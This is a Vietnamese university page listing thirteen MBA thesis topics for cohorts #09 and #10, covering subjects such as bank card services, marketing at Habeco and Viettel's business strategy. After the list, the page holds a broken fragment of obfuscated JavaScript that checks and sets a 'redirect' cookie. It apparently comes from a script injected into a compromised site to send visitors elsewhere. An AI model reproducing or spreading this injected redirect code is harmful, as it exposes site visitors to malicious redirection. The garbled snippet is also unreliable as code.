Thông tin luận văn bảo vệ tốt nghiệp – MBA #09, #10

Danh sách đề tài luận văn Khóa MBA #09, #10:

STT HỌC VIÊN KHÓA HỌC TÊN ĐỀ TÀI
1 Cao Lan Anh MBA #09 Nâng cao chất lượng dịch vụ thẻ tại NH TMCP Đầu tư và Phát triển Việt Nam – Chi nhánh Sở giao dịch 1.
Xem chi tiết tại đây
2 Đỗ Thị Thu Trang MBA #09 Hoàn thiện hoạt động đào tạo nhân sự tại Công ty TNHH Sumitomo Electric Interconnect Products Việt Nam.
Xem chi tiết tại đây
3 Lê Quang Thiệp MBA #09 Một số biện pháp hoàn thiện công tác quản lý tài sản cho thuê tài chính tại Công ty TNHH MTV Cho thuê tài chính Công nghiệp tàu thủy.
Xem chi tiết tại đây
4 Ngô Quốc Anh MBA #09 Đổi mới mô hình kinh doanh bằng công cụ Mô hình Kinh doanh Canvas: Trường hợp của Phục Hưng Holdings.
Xem chi tiết tại đây
5 Ngô Việt Hà MBA #09 Xây dựng chiến lược marketing MIX tại Habeco trong thời kỳ mới.
Xem chi tiết tại đây
6 Nguyễn Hoài Nam                          MBA #09 Đánh giá mức độ hài lòng của khách hàng đối với chất lượng dịch vụ sau bán hàng của công ty TNHH thiết bị nặng Marubeni.
Xem chi tiết tại đây
7 Nguyễn Hoàng Thụy Trang MBA #09 Hoạch định chiến lược kinh doanh cho dịch vụ viễn thông di động của Công ty Viettel Combodia (VTC) tại thị trường Campuchia giai đoạn 2017-2020.
Xem chi tiết tại đây
8 Nguyễn Thị Hiền MBA #09 Thương hiệu và hoạt động truyền thông Marketing tổng hợp đẩy mạnh thương hiệu tại Ngân hàng Thương mại cổ phần Đầu tư và Phát triển Việt Nam.
Xem chi tiết tại đây
9 Nguyễn Tiến Dũng MBA #09 Sự hài lòng của khách hàng về chất lượng dịch vụ Internet banking của Ngân hàng TMCP Đầu tư và phát triển Việt Nam – Chi nhánh Sở giao dịch 1.
Xem chi tiết tại đây
10 Nguyễn Văn Linh MBA #09 Nâng cao năng lực cho đội ngũ quản lý cấp trung của Viettel Hà Nội.
Xem chi tiết tại đây
11 Trần Văn Viên MBA #09 Ảnh hưởng của quyết định lựa chọn công nghệ trong hoạt động sản xuất, kinh doanh của Gtel Mobile.
Xem chi tiết tại đây
12 Vũ Anh Tuấn MBA #09 Nghiên cứu giải phám tăng số lượng thuê bao K+ Công ty TNHH Truyền hình số vệ tinh Việt Nam.
Xem chi tiết tại đây
13 Lê Ngọc Minh Thu MBA #10 Nghiên cứu sâu về ảnh hưởng của việc quản lý khen thưởng đối với hoạt động của cán bộ trong Ngành Ngân hàng Việt Nam – Trường hợp về Ngân hàng Đầu tư và Phát triển Việt Nam (BIDV).
Xem chi tiết tại đây

 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

Trả lời

Email của bạn sẽ không được hiển thị công khai.